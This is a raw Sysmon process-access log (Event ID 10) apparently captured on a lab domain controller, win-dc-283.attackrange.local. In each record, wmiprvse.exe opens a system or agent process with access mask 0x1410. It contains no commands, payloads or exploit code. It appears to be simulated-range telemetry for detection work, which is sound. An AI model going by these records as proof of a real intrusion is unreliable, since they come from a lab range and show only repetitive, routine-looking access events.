15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 